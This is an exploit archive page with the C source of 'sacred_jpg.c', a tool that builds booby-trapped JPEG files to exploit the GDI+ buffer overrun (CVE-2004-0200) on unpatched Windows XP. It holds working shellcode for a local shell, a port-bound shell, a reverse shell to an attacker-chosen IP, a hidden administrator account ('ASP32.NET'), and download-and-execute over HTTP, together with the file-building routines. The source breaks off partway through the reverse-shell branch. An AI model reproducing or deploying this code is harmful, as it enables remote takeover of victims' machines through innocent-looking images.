exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

sacred_jpg.c

sacred_jpg.c
Posted Oct 7, 2004
Authored by Crypto

GDI+ buffer overrun exploit that builds a malicious .JPG file.

tags | exploit, overflow
advisories | CVE-2004-0200
SHA-256 | 2120feeb6515aaa49b2db0fdada31774f9ac67c30e70927ba0892e23f6f7acc3
Download | Favorite | View

sacred_jpg.c

Change Mirror Download
//+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
// This is provided as proof-of-concept code only for educational
// purposes and testing by authorized individuals with permission to
// do so.
//
//                 .:[Sacred Desciples of Doom]:.    
//
//  GDI+ buffer overrun Exploit, Modified by Crypto <crypto@xaker.ru> 
//                 Greets to FoToZ who found the bug
//               Exploit will build a malicious JPG File
//
// Note: The headers here are only sample headers taken from a .JPG file,
//       with the FF FE 00 01 inserted in header1.We can use a 2500 bytes
//       space for shellcode.
//
//Greets to my friends: Wyk,SSarpele,sAD_sMile, Pimpa, Sacred, to my doggy Kiki :)
//and to other Hackers from Republica Moldova.
//
// Tested on an unpatched WinXP SP1 Eng
//
// PS:I wass playing with this exploit couple of days ... when I whanted to post
// it, HighT1mes already made an exploit with the same functionality ...
// but with really not nice shellcodes, especialy the shellcode for adding an
// administrator ... but http_shellcode was nice :)
// you stay on #romhack , I stay on #moldhack heheh :) nick:Alladin`
//++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
#include <direct.h>
#include <windows.h>
#include <winbase.h>
#include <winnls.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <windows.h>
#pragma comment(lib, "ws2_32.lib")

#define SET_PORTBIND_PORT(buf, port) *(unsigned short *)(((buf)+235+16)) = (port)
#define SET_CONNECTBACK_IP(buf, ip)     *(unsigned long *)(((buf)+221+16)) = (ip)
#define SET_CONNECTBACK_PORT(buf, port) *(unsigned short *)(((buf)+228+16)) = (port)



//++++++++++++++++++++++++++++++++++++++++++++++++++++++++
//pop up cmd.exe
char shellcode1[]=
"\x68"          // push
"cmd "
"\x8B\xC4"        // mov eax,esp
"\x50"          // push eax
"\xB8\x44\x80\xC2\x77"  // mov eax,77c28044h (address of system() on WinXP SP1)
"\xFF\xD0";        // call eax


//bind cmd.exe on a [port] defined by user
unsigned char shellcode2[] =
"\xe8\x56\x00\x00\x00\x53\x55\x56\x57\x8b\x6c\x24\x18\x8b\x45\x3c"
"\x8b\x54\x05\x78\x01\xea\x8b\x4a\x18\x8b\x5a\x20\x01\xeb\xe3\x32"
"\x49\x8b\x34\x8b\x01\xee\x31\xff\xfc\x31\xc0\xac\x38\xe0\x74\x07"
"\xc1\xcf\x0d\x01\xc7\xeb\xf2\x3b\x7c\x24\x14\x75\xe1\x8b\x5a\x24"
"\x01\xeb\x66\x8b\x0c\x4b\x8b\x5a\x1c\x01\xeb\x8b\x04\x8b\x01\xe8"
"\xeb\x02\x31\xc0\x5f\x5e\x5d\x5b\xc2\x08\x00\x5e\x6a\x30\x59\x64"
"\x8b\x19\x8b\x5b\x0c\x8b\x5b\x1c\x8b\x1b\x8b\x5b\x08\x53\x68\x8e"
"\x4e\x0e\xec\xff\xd6\x89\xc7\x81\xec\x00\x01\x00\x00\x57\x56\x53"
"\x89\xe5\xe8\x27\x00\x00\x00\x90\x01\x00\x00\xb6\x19\x18\xe7\xa4"
"\x19\x70\xe9\xe5\x49\x86\x49\xa4\x1a\x70\xc7\xa4\xad\x2e\xe9\xd9"
"\x09\xf5\xad\xcb\xed\xfc\x3b\x57\x53\x32\x5f\x33\x32\x00\x5b\x8d"
"\x4b\x20\x51\xff\xd7\x89\xdf\x89\xc3\x8d\x75\x14\x6a\x07\x59\x51"
"\x53\xff\x34\x8f\xff\x55\x04\x59\x89\x04\x8e\xe2\xf2\x2b\x27\x54"
"\xff\x37\xff\x55\x30\x31\xc0\x50\x50\x50\x50\x40\x50\x40\x50\xff"
"\x55\x2c\x89\xc7\x31\xdb\x53\x53\x68\x02\x00\x22\x11\x89\xe0\x6a"
"\x10\x50\x57\xff\x55\x24\x53\x57\xff\x55\x28\x53\x54\x57\xff\x55"
"\x20\x89\xc7\x68\x43\x4d\x44\x00\x89\xe3\x87\xfa\x31\xc0\x8d\x7c"
"\x24\xac\x6a\x15\x59\xf3\xab\x87\xfa\x83\xec\x54\xc6\x44\x24\x10"
"\x44\x66\xc7\x44\x24\x3c\x01\x01\x89\x7c\x24\x48\x89\x7c\x24\x4c"
"\x89\x7c\x24\x50\x8d\x44\x24\x10\x54\x50\x51\x51\x51\x41\x51\x49"
"\x51\x51\x53\x51\xff\x75\x00\x68\x72\xfe\xb3\x16\xff\x55\x04\xff"
"\xd0\x89\xe6\xff\x75\x00\x68\xad\xd9\x05\xce\xff\x55\x04\x89\xc3"
"\x6a\xff\xff\x36\xff\xd3\xff\x75\x00\x68\x7e\xd8\xe2\x73\xff\x55"
"\x04\x31\xdb\x53\xff\xd0"; 


//It will create a new user account with the username="ASP32.NET"
// and password of "ASP" and add it to the local group "Administrators"
char shellcode3[]=
"\xfc\xe8\x56\x00\x00\x00\x53\x55\x56\x57\x8b\x6c\x24\x18\x8b\x45"
"\x3c\x8b\x54\x05\x78\x01\xea\x8b\x4a\x18\x8b\x5a\x20\x01\xeb\xe3"
"\x32\x49\x8b\x34\x8b\x01\xee\x31\xff\xfc\x31\xc0\xac\x38\xe0\x74"
"\x07\xc1\xcf\x0d\x01\xc7\xeb\xf2\x3b\x7c\x24\x14\x75\xe1\x8b\x5a"
"\x24\x01\xeb\x66\x8b\x0c\x4b\x8b\x5a\x1c\x01\xeb\x8b\x04\x8b\x01"
"\xe8\xeb\x02\x31\xc0\x5f\x5e\x5d\x5b\xc2\x08\x00\x5e\x6a\x30\x59"
"\x64\x8b\x19\x8b\x5b\x0c\x8b\x5b\x1c\x8b\x1b\x8b\x5b\x08\x53\x68"
"\x8e\x4e\x0e\xec\xff\xd6\x89\xc7\xeb\x18\x53\x68\x98\xfe\x8a\x0e"
"\xff\xd6\xff\xd0\x53\x68\xef\xce\xe0\x60\xff\xd6\x6a\x00\xff\xd0"
"\xff\xd0\x6a\x00\xe8\xe1\xff\xff\xff\x63\x6d\x64\x2e\x65\x78\x65"
"\x20\x2f\x63\x20\x6e\x65\x74\x20\x75\x73\x65\x72\x20\x41\x53\x50"
"\x33\x32\x2e\x4e\x45\x54\x20\x41\x53\x50\x20\x2f\x41\x44\x44\x20"
"\x26\x26\x20\x6e\x65\x74\x20\x6c\x6f\x63\x61\x6c\x67\x72\x6f\x75"
"\x70\x20\x41\x64\x6d\x69\x6e\x69\x73\x74\x72\x61\x74\x6f\x72\x73"
"\x20\x41\x53\x50\x33\x32\x2e\x4e\x45\x54\x20\x2f\x41\x44\x44\x00";


//connect back to a user defined [ip] and [port]
unsigned char shellcode4[] = 
"\xe8\x56\x00\x00\x00\x53\x55\x56\x57\x8b\x6c\x24\x18\x8b\x45\x3c"
"\x8b\x54\x05\x78\x01\xea\x8b\x4a\x18\x8b\x5a\x20\x01\xeb\xe3\x32"
"\x49\x8b\x34\x8b\x01\xee\x31\xff\xfc\x31\xc0\xac\x38\xe0\x74\x07"
"\xc1\xcf\x0d\x01\xc7\xeb\xf2\x3b\x7c\x24\x14\x75\xe1\x8b\x5a\x24"
"\x01\xeb\x66\x8b\x0c\x4b\x8b\x5a\x1c\x01\xeb\x8b\x04\x8b\x01\xe8"
"\xeb\x02\x31\xc0\x5f\x5e\x5d\x5b\xc2\x08\x00\x5e\x6a\x30\x59\x64"
"\x8b\x19\x8b\x5b\x0c\x8b\x5b\x1c\x8b\x1b\x8b\x5b\x08\x53\x68\x8e"
"\x4e\x0e\xec\xff\xd6\x89\xc7\x81\xec\x00\x01\x00\x00\x57\x56\x53"
"\x89\xe5\xe8\x1f\x00\x00\x00\x90\x01\x00\x00\xb6\x19\x18\xe7\xa4"
"\x19\x70\xe9\xec\xf9\xaa\x60\xd9\x09\xf5\xad\xcb\xed\xfc\x3b\x57"
"\x53\x32\x5f\x33\x32\x00\x5b\x8d\x4b\x18\x51\xff\xd7\x89\xdf\x89"
"\xc3\x8d\x75\x14\x6a\x05\x59\x51\x53\xff\x34\x8f\xff\x55\x04\x59"
"\x89\x04\x8e\xe2\xf2\x2b\x27\x54\xff\x37\xff\x55\x28\x31\xc0\x50"
"\x50\x50\x50\x40\x50\x40\x50\xff\x55\x24\x89\xc7\x68\x7f\x00\x00"
"\x01\x68\x02\x00\x22\x11\x89\xe1\x6a\x10\x51\x57\xff\x55\x20\x59"
"\x59\x68\x43\x4d\x44\x00\x89\xe3\x87\xfa\x31\xc0\x8d\x7c\x24\xac"
"\x6a\x15\x59\xf3\xab\x87\xfa\x83\xec\x54\xc6\x44\x24\x10\x44\x66"
"\xc7\x44\x24\x3c\x01\x01\x89\x7c\x24\x48\x89\x7c\x24\x4c\x89\x7c"
"\x24\x50\x8d\x44\x24\x10\x54\x50\x51\x51\x51\x41\x51\x49\x51\x51"
"\x53\x51\xff\x75\x00\x68\x72\xfe\xb3\x16\xff\x55\x04\xff\xd0\x89"
"\xe6\xff\x75\x00\x68\xad\xd9\x05\xce\xff\x55\x04\x89\xc3\x6a\xff"
"\xff\x36\xff\xd3\xff\x75\x00\x68\x7e\xd8\xe2\x73\xff\x55\x04\x31"
"\xdb\x53\xff\xd0";

//donwload from http
char shellcode5[]=
"\xEB\x0F\x58\x80\x30\x17\x40\x81\x38\x6D\x30\x30\x21\x75\xF4"
"\xEB\x05\xE8\xEC\xFF\xFF\xFF\xFE\x94\x16\x17\x17\x4A\x42\x26"
"\xCC\x73\x9C\x14\x57\x84\x9C\x54\xE8\x57\x62\xEE\x9C\x44\x14"
"\x71\x26\xC5\x71\xAF\x17\x07\x71\x96\x2D\x5A\x4D\x63\x10\x3E"
"\xD5\xFE\xE5\xE8\xE8\xE8\x9E\xC4\x9C\x6D\x2B\x16\xC0\x14\x48"
"\x6F\x9C\x5C\x0F\x9C\x64\x37\x9C\x6C\x33\x16\xC1\x16\xC0\xEB"
"\xBA\x16\xC7\x81\x90\xEA\x46\x26\xDE\x97\xD6\x18\xE4\xB1\x65"
"\x1D\x81\x4E\x90\xEA\x63\x05\x50\x50\xF5\xF1\xA9\x18\x17\x17"
"\x17\x3E\xD9\x3E\xE0\xFE\xFF\xE8\xE8\xE8\x26\xD7\x71\x9C\x10"
"\xD6\xF7\x15\x9C\x64\x0B\x16\xC1\x16\xD1\xBA\x16\xC7\x9E\xD1"
"\x9E\xC0\x4A\x9A\x92\xB7\x17\x17\x17\x57\x97\x2F\x16\x62\xED"
"\xD1\x17\x17\x9A\x92\x0B\x17\x17\x17\x47\x40\xE8\xC1\x7F\x13"
"\x17\x17\x17\x7F\x17\x07\x17\x17\x7F\x68\x81\x8F\x17\x7F\x17"
"\x17\x17\x17\xE8\xC7\x9E\x92\x9A\x17\x17\x17\x9A\x92\x18\x17"
"\x17\x17\x47\x40\xE8\xC1\x40\x9A\x9A\x42\x17\x17\x17\x46\xE8"
"\xC7\x9E\xD0\x9A\x92\x4A\x17\x17\x17\x47\x40\xE8\xC1\x26\xDE"
"\x46\x46\x46\x46\x46\xE8\xC7\x9E\xD4\x9A\x92\x7C\x17\x17\x17"
"\x47\x40\xE8\xC1\x26\xDE\x46\x46\x46\x46\x9A\x82\xB6\x17\x17"
"\x17\x45\x44\xE8\xC7\x9E\xD4\x9A\x92\x6B\x17\x17\x17\x47\x40"
"\xE8\xC1\x9A\x9A\x86\x17\x17\x17\x46\x7F\x68\x81\x8F\x17\xE8"
"\xA2\x9A\x17\x17\x17\x44\xE8\xC7\x48\x9A\x92\x3E\x17\x17\x17"
"\x47\x40\xE8\xC1\x7F\x17\x17\x17\x17\x9A\x8A\x82\x17\x17\x17"
"\x44\xE8\xC7\x9E\xD4\x9A\x92\x26\x17\x17\x17\x47\x40\xE8\xC1"
"\xE8\xA2\x86\x17\x17\x17\xE8\xA2\x9A\x17\x17\x17\x44\xE8\xC7"
"\x9A\x92\x2E\x17\x17\x17\x47\x40\xE8\xC1\x44\xE8\xC7\x9A\x92"
"\x56\x17\x17\x17\x47\x40\xE8\xC1\x7F\x12\x17\x17\x17\x9A\x9A"
"\x82\x17\x17\x17\x46\xE8\xC7\x9A\x92\x5E\x17\x17\x17\x47\x40"
"\xE8\xC1\x7F\x17\x17\x17\x17\xE8\xC7\xFF\x6F\xE9\xE8\xE8\x50"
"\x72\x63\x47\x65\x78\x74\x56\x73\x73\x65\x72\x64\x64\x17\x5B"
"\x78\x76\x73\x5B\x7E\x75\x65\x76\x65\x6E\x56\x17\x41\x7E\x65"
"\x63\x62\x76\x7B\x56\x7B\x7B\x78\x74\x17\x48\x7B\x74\x65\x72"
"\x76\x63\x17\x48\x7B\x60\x65\x7E\x63\x72\x17\x48\x7B\x74\x7B"
"\x78\x64\x72\x17\x40\x7E\x79\x52\x6F\x72\x74\x17\x52\x6F\x7E"
"\x63\x47\x65\x78\x74\x72\x64\x64\x17\x40\x7E\x79\x5E\x79\x72"
"\x63\x17\x5E\x79\x63\x72\x65\x79\x72\x63\x58\x67\x72\x79\x56"
"\x17\x5E\x79\x63\x72\x65\x79\x72\x63\x58\x67\x72\x79\x42\x65"
"\x7B\x56\x17\x5E\x79\x63\x72\x65\x79\x72\x63\x45\x72\x76\x73"
"\x51\x7E\x7B\x72\x17\x17\x17\x17\x17\x17\x17\x17\x17\x7A\x27"
"\x27\x39\x72\x6F\x72\x17"
"m00!";



//add other shellcodes that you need here :)
//+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

char header1[]=
"\xFF\xD8\xFF\xE0\x00\x10\x4A\x46\x49\x46\x00\x01\x02\x00\x00\x64"
"\x00\x64\x00\x00\xFF\xEC\x00\x11\x44\x75\x63\x6B\x79\x00\x01\x00"
"\x04\x00\x00\x00\x0A\x00\x00\xFF\xEE\x00\x0E\x41\x64\x6F\x62\x65"
"\x00\x64\xC0\x00\x00\x00\x01\xFF\xFE\x00\x01\x00\x14\x10\x10\x19"
"\x12\x19\x27\x17\x17\x27\x32\xEB\x0F\x26\x32\xDC\xB1\xE7\x70\x26"
"\x2E\x3E\x35\x35\x35\x35\x35\x3E";

char setNOPs1[]=
"\xE8\x00\x00\x00\x00\x5B\x8D\x8B"
"\x00\x05\x00\x00\x83\xC3\x12\xC6\x03\x90\x43\x3B\xD9\x75\xF8";

char setNOPs2[]=
"\x3E\xE8\x00\x00\x00\x00\x5B\x8D\x8B"
"\x2F\x00\x00\x00\x83\xC3\x12\xC6\x03\x90\x43\x3B\xD9\x75\xF8";

char header2[]=
"\x44"
"\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x01\x15\x19\x19"
"\x20\x1C\x20\x26\x18\x18\x26\x36\x26\x20\x26\x36\x44\x36\x2B\x2B"
"\x36\x44\x44\x44\x42\x35\x42\x44\x44\x44\x44\x44\x44\x44\x44\x44"
"\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44"
"\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\xFF\xC0\x00"
"\x11\x08\x03\x59\x02\x2B\x03\x01\x22\x00\x02\x11\x01\x03\x11\x01"
"\xFF\xC4\x00\xA2\x00\x00\x02\x03\x01\x01\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x03\x04\x01\x02\x05\x00\x06\x01\x01\x01\x01"
"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x02"
"\x03\x10\x00\x02\x01\x02\x04\x05\x02\x03\x06\x04\x05\x02\x06\x01"
"\x05\x01\x01\x02\x03\x00\x11\x21\x31\x12\x04\x41\x51\x22\x13\x05"
"\x61\x32\x71\x81\x42\x91\xA1\xC1\x52\x23\x14\xB1\xD1\x62\x15\xF0"
"\xE1\x72\x33\x06\x82\x24\xF1\x92\x43\x53\x34\x16\xA2\xD2\x63\x83"
"\x44\x54\x25\x11\x00\x02\x01\x03\x02\x04\x03\x08\x03\x00\x02\x03"
"\x01\x00\x00\x00\x00\x01\x11\x21\x31\x02\x41\x12\xF0\x51\x61\x71"
"\x81\x91\xA1\xB1\xD1\xE1\xF1\x22\x32\x42\x52\xC1\x62\x13\x72\x92"
"\xD2\x03\x23\x82\xFF\xDA\x00\x0C\x03\x01\x00\x02\x11\x03\x11\x00"
"\x3F\x00\x0F\x90\xFF\x00\xBC\xDA\xB3\x36\x12\xC3\xD4\xAD\xC6\xDC"
"\x45\x2F\xB2\x97\xB8\x9D\xCB\x63\xFD\x26\xD4\xC6\xD7\x70\xA4\x19"
"\x24\x50\xCA\x46\x2B\xFC\xEB\x3B\xC7\xC9\xA5\x4A\x8F\x69\x26\xDF"
"\x6D\x72\x4A\x9E\x27\x6B\x3E\xE6\x92\x86\x24\x85\x04\xDB\xED\xA9"
"\x64\x8E\x6B\x63\x67\x19\x1A\xA5\xE7\xB8\x28\x3D\x09\xAB\x5D\x5F"
"\x16\xF7\x8C\xED\x49\x4C\xF5\x01\xE6\xE5\xD5\x1C\x49\xAB\x10\x71"
"\xA6\x36\x9B\x93\x24\x61\x00\x0F\x61\xEC\x34\xA7\x9C\x23\xF4\x96"
"\xC6\xE6\xAF\xB7\x80\x76\xEF\x93\xF0\xAA\x28\x8A\x6B\xE0\x18\xC0"
"\xA4\x9B\x7E\x90\x39\x03\xC2\x90\xDC\x43\x31\x91\x62\x91\x86\x23"
"\x35\x35\xA2\x80\x4D\xFA\x72\x31\x07\x9D\x03\x70\xA8\x93\x24\x4F"
"\x89\x51\x83\x5E\xA4\x2E\x7A\xC0\x7D\xA9\x8A\x10\x61\x64\x07\xFA"
"\x88\xC6\x89\x26\xDA\x0F\x20\xBD\xB9\x16\xD2\xA8\xE8\x91\x3F\x1A"
"\xE2\xBA\xF0\xBE\x74\xAB\x1D\xC4\x44\x15\x1A\x8A\x9C\xC7\x2A\x6B"
"\xA3\x33\xB7\x1E\x88\x47\x69\xA9\x64\x68\x26\xC1\x97\x0B\xD6\x86"
"\x8B\x1B\x29\xC6\x87\xE4\xC7\xFD\xCC\x53\x11\xA5\x9C\x62\x6A\xE5"
"\x40\x37\x61\x89\xF6\xB2\x9C\x2A\x7C\xFD\x05\x6A\x30\x5F\x52\x02"
"\xEB\x72\xBF\x7D\x74\x4C\x23\xB9\x8F\xD8\x78\x67\x54\x59\x64\x47"
"\xC5\x75\x21\x18\xD5\xE3\x58\xE1\x72\x63\xBF\x6D\xBD\xCB\xCA\x82"
"\x65\xE7\xDB\x09\x54\x4F\x0D\x95\x86\x76\xE3\xF2\xA0\x48\x82\x55"
"\xD7\xA6\xCE\xA7\xAA\xDC\x6A\xF1\xA9\x8E\xE0\x35\xC1\xCA\xA1\xD4"
"\x93\xD2\xD6\x39\x95\x3C\x6B\x46\x60\xAC\xC1\x3B\x60\xC9\x70\x84"
"\x8E\xA1\x9A\x9A\x20\x01\x94\xCA\x08\x91\x53\xDC\x01\xB1\xB5\x12"
"\x37\x11\xC6\xC1\xAC\xF1\x11\xD4\x9C\x6B\x3E\x69\x76\xF0\x1D\x7B"
"\x52\x6D\xC9\xA8\x66\x94\xBB\x79\x8F\x7E\xDE\x17\xFD\x4D\xAB\x1E"
"\x76\x7A\xA3\x2B\xE2\x50\x06\xB7\x2C\xEB\x2A\x49\xC9\xEA\x4E\x9B"
"\xE7\xCA\xAF\x1E\xEC\x23\xDC\x8B\xE1\x6B\x5F\x1A\x9B\xE8\x49\x2E"
"\x63\xE5\x03\x32\xCD\x19\xB8\x23\x10\x78\x1F\x85\x5C\x15\x8C\x97"
"\x84\x9B\xDB\x15\x35\x9F\x16\xE0\x1E\x86\xB9\x8F\x97\x11\x4E\xDA"
"\x35\x02\x45\x25\x93\xF8\x55\x24\x17\xB9\x1B\xF5\xC8\x07\xA9\xE2"
"\x2A\x76\xB0\xC2\x37\x01\x95\xAD\x81\xB6\x1C\x6A\xA2\x38\xD9\xAE"
"\xCA\x59\x18\x75\x25\xFF\x00\x81\xAE\xD8\xE8\xBB\x47\x62\xAC\xB7"
"\xB6\xA1\x8D\x40\xE3\x86\x65\x6D\x1E\xDB\x89\x2F\x9D\xCD\x6B\x24"
"\x62\x41\x61\x89\xAC\x2D\x8B\x3E\xB6\x68\xC0\x63\x73\x70\x6B\x6B"
"\x6A\xA1\x7A\xAC\x56\xE7\x11\x56\x58\xD4\x13\xA4\x0B\xB6\xEB\xB3"
"\x3B\x47\x22\x95\xD3\x53\x2E\xEA\x19\x86\x96\xF7\x03\x83\x52\x9E"
"\x54\xAB\x6E\x58\x63\x7C\x33\xCE\x93\xB1\x19\x1C\xE9\xDB\xAA\x35"
"\xBF\x46\x8D\xD4\xD2\x56\xE0\xE0\x33\xA1\x4D\x0A\x4E\x3B\xB1\xCD"
"\xD4\x06\x44\x56\x4A\xCD\x24\x26\xEA\x6D\x7A\x87\xDC\x3B\x60\x6D"
"\xFC\x2A\x86\x1B\x97\x36\x6D\x42\x04\xA0\x11\xEE\xE7\x46\x22\x35"
"\xD5\x26\xB0\x1C\x0B\x7C\x69\x5F\x06\xEC\x5A\xC5\x0B\x46\x70\x27"
"\xF2\xD4\x79\xAD\x89\xDA\x30\x74\xBD\x98\xE4\x68\x58\x86\xE4\x1B"
"\x69\xB9\xDC\x2B\x30\x87\x48\x53\xC5\x85\x3B\xDD\x8A\x4E\xB5\x42"
"\xB2\x8C\x6E\x2C\x01\xF8\x56\x04\x7B\xC9\xA3\x05\x4F\xB4\xD5\xA2"
"\xDF\xF6\xFD\xC6\xE2\xA7\x3C\x89\x24\xFE\xA9\x5E\xC3\xD4\x6D\xF7"
"\x85\xC9\x59\x39\x63\x59\x9B\xFF\x00\x06\x1A\x5E\xFA\x69\x0A\x46"
"\x2B\xC0\x9F\xC2\x91\x8B\xC9\x40\x58\x16\xBD\xF2\xC0\xD3\x3B\x7F"
"\x2D\xA9\xBB\x2E\x49\x42\x6D\x52\x70\x39\x62\x9F\x08\x73\x6F\x20"
"\x09\x64\x00\x01\x83\x2B\x00\xD5\x97\xBC\xDC\xF6\x9C\xA7\x66\xEA"
"\xD9\xB6\x9F\xE1\x56\xDE\xBA\xEC\x65\xB4\x44\xD8\xE3\x8D\x52\x2F"
"\x36\xCE\x74\x33\x7E\x9F\x2E\x22\x99\x8B\xC9\x6D\x5A\x6D\x9E\xA8"
"\x22\xC7\x0C\xA8\x62\x3D\x17\x1D\x2F\xC8\xFA\xD4\xB0\x9E\x14\x45"
"\x45\xD5\x6E\x96\x04\xE1\xF1\xA0\x37\x90\x5B\xD8\x7F\x81\x57\x1B"
"\xC8\xD5\x48\x27\x0E\x3C\x6B\x3D\xCD\x44\x15\x92\x41\x25\x94\x82"
"\xAE\x0E\x42\x97\x8D\x8C\x6D\xAE\x56\xB8\x26\xD8\x0F\xE3\x43\x93"
"\x73\x18\x75\x28\xD7\xF8\xD5\xFF\x00\x74\xE4\x18\xC2\x82\xAC\x6F"
"\x86\x7F\x2A\x4C\xBE\xE5\xFC\xD2\x22\xCC\x9A\x32\xD1\x7C\x7D\x68"
;

void show()
{
    printf("_____________________________________________________________________\n\n");
    printf("                 .:[Sacred Desciples of Doom]:.                      \n");
    printf("  GDI+ buffer overrun Exploit, Modified by Crypto <crypto@xaker.ru>  \n");
    printf("               Greets to FoToZ who found the bug                     \n");
    printf("           These Exploit will build malicious JPG File               \n\n");
    printf("_____________________________________________________________________\n\n");


}

void show_usage(char s[255])
{
    printf("_____________________________________________________________________\n\n");
    printf("                 .:[Sacred Desciples of Doom]:.                      \n");
    printf("  GDI+ buffer overrun Exploit, Modified by Crypto <crypto@xaker.ru>  \n");
    printf("               Greets to FoToZ who found the bug                     \n");
    printf("           These Exploit will build malicious JPG File               \n\n");
    printf("_____________________________________________________________________\n\n");
    printf("  Usage:                                                              \n");
    printf("\t%s 1: For lounching a local cmd.exe (not bound to the net)\n",s);
    printf("\t%s 2 [port]: For lounching cmd.exe on defined [port]\n",s);
    printf("\t%s 3: For creating a new user account\n",s);
    printf("\twith the username=\"ASP32.NET\"\n");
    printf("\tand password=\"ASP\"and add it to the local group \"Administrators\"\n");
    printf("\t%s 4 [ip] [port]: For making a conection to a defined [ip]\n",s);
    printf("\tand on defined [port] and bind cmd.exe on it\n");
    printf("\t%s 5 [http]: For downloading and then executing a file\n",s);
    exit(1);
}

int main(int argc, char *argv[])
{
    
    FILE *fout;
    unsigned int i=0,j=0;
    unsigned short port=31337;
    unsigned long ip;
    WSADATA wsa; 
     
  
    
    if (argc < 2) { printf("%d",sizeof(shellcode5));
            show_usage(argv[0]);
            exit(1);
            }

    //pop up cmd.exe
    if (atoi(argv[1]) == 1) 
    {
     show();
         mkdir("Crypto");
     fout=fopen("Crypto\\Crypto1.jpg","wb");

      if( !fout ) {
                   printf("\t\tErorr:Opening File ...\n");
                   exit(1);
            }



    for(i=0;i<sizeof(shellcode1)-1;i++)
    if( 0xD9FF == *(unsigned short *)&shellcode1[i] ) 
    printf("\t\tWARNING: SHELLCODE CONTAINS FFh D9h, FIX UR SHELLCODE\n");
      

    printf("\t\tShellcode Size is %u bytes\n", sizeof(shellcode1)-1);

    j=sizeof(header1)+sizeof(setNOPs1)+sizeof(header2)-3;
       
    for(i=0;i<sizeof(header1)-1;i++) fputc(header1[i],fout);
    for(i=0;i<sizeof(setNOPs1)-1;i++)fputc(setNOPs1[i],fout);
    for(i=0;i<sizeof(header2)-1;i++) fputc(header2[i],fout);

    for(i=j;i<0x63c;i++) fputc(0x90,fout); // stuff in a couple of NOPs
    j=i;
    for(i=0;i<sizeof(shellcode1)-1;i++) fputc(shellcode1[i],fout);
    for(i=i+j;i<0x1000-sizeof(setNOPs2)+1;i++) fputc(0x90,fout);
    for(j=0;i<0x1000 && j<sizeof(setNOPs2)-1;i++,j++) fputc(setNOPs2[j],fout);

    fprintf(fout,"\xFF\xD9");
  
    printf("\t\tOk, Malicious JPG File Created ...\n\n");
    
    fcloseall();
    }

  //bind cmd.exe on a [port]
  if ((atoi(argv[1]) == 2)) 
    {
     show();
         mkdir("Crypto");
     fout=fopen("Crypto\\Crypto2.jpg","wb");

      if( !fout ) {
                   printf("\t\tErorr:Opening File ...\n");
                   exit(1);
            }
    
    // lets initialize the socket library, couse we use htons function 
    if (WSAStartup(MAKEWORD(1,1),&wsa)==SOCKET_ERROR) {
    printf("We got a problem ... Winsock didn't initialize!!\n");
    exit(1);
    }
    
    port = atoi(argv[2]);
    SET_PORTBIND_PORT(shellcode2, htons(port));

    for(i=0;i<sizeof(shellcode2)-1;i++)
    if( 0xD9FF == *(unsigned short *)&shellcode2[i] ) 
    printf("\t\tWarning: Shellcode Contains FFh D9h, Fix Shellcode\n");

    printf("\t\tShellcode Size is %u bytes\n", sizeof(shellcode2)-1);

    j=sizeof(header1)+sizeof(setNOPs1)+sizeof(header2)-3;
       
    for(i=0;i<sizeof(header1)-1;i++) fputc(header1[i],fout);
    for(i=0;i<sizeof(setNOPs1)-1;i++)fputc(setNOPs1[i],fout);
    for(i=0;i<sizeof(header2)-1;i++) fputc(header2[i],fout);

    for(i=j;i<0x63c;i++) fputc(0x90,fout); // stuff in a couple of NOPs
    j=i;
    for(i=0;i<sizeof(shellcode2)-1;i++) fputc(shellcode2[i],fout);
    for(i=i+j;i<0x1000-sizeof(setNOPs2)+1;i++) fputc(0x90,fout);
    for(j=0;i<0x1000 && j<sizeof(setNOPs2)-1;i++,j++) fputc(setNOPs2[j],fout);

    fprintf(fout,"\xFF\xD9");
  
    printf("\t\tOk, Malicious JPG File Created ...\n\n");
    
    fcloseall();
    WSACleanup();  
    }

  //Create User "ASP32.NET"
  if (atoi(argv[1]) == 3) 
  {
    show(); 
    mkdir("Crypto");
     fout=fopen("Crypto\\Crypto3.jpg","wb");

      if( !fout ) {
                   printf("\t\tErorr:Opening File ...\n");
                   exit(1);
            }



    for(i=0;i<sizeof(shellcode3)-1;i++)
    if( 0xD9FF == *(unsigned short *)&shellcode3[i] ) 
    printf("\t\tWARNING: SHELLCODE CONTAINS FFh D9h, FIX UR SHELLCODE\n");
      

    printf("\t\tShellcode Size is %u bytes\n", sizeof(shellcode3)-1);

    j=sizeof(header1)+sizeof(setNOPs1)+sizeof(header2)-3;
       
    for(i=0;i<sizeof(header1)-1;i++) fputc(header1[i],fout);
    for(i=0;i<sizeof(setNOPs1)-1;i++)fputc(setNOPs1[i],fout);
    for(i=0;i<sizeof(header2)-1;i++) fputc(header2[i],fout);

    for(i=j;i<0x63c;i++) fputc(0x90,fout); // stuff in a couple of NOPs
    j=i;
    for(i=0;i<sizeof(shellcode1)-1;i++) fputc(shellcode3[i],fout);
    for(i=i+j;i<0x1000-sizeof(setNOPs2)+1;i++) fputc(0x90,fout);
    for(j=0;i<0x1000 && j<sizeof(setNOPs2)-1;i++,j++) fputc(setNOPs2[j],fout);

    fprintf(fout,"\xFF\xD9");
  
    printf("\t\tOk, Malicious JPG File Created ...\n\n");
    
    fcloseall();
    }

  //reverse connect back
  if (atoi(argv[1]) == 4)
    {
     show();
         mkdir("Crypto");
     fout=fopen("Crypto\\Crypto2.jpg","wb");

      if( !fout ) {
                   printf("\t\tErorr:Opening File ...\n");
                   exit(1);
            }
    
    // let's initialize the socket library, couse we use htons function 
    if (WSAStartup(MAKEWORD(1,1),&wsa)==SOCKET_ERROR) {
    printf("We got a problem ... Winsock didn't initialize!!\n");
    exit(1);
    }
    
    ip = inet_addr(argv[2]);
    port = atoi(argv[3]);    
    SET_CONNECTBACK_IP(shellcode4, ip);
    SET_CONNECTBACK_PORT(shellcode4, htons(port));

    for(i=0;i<sizeof(shellcode4)-1;i++)
    if( 0xD9FF == *(unsigned short *)&shellcode4[i] ) 
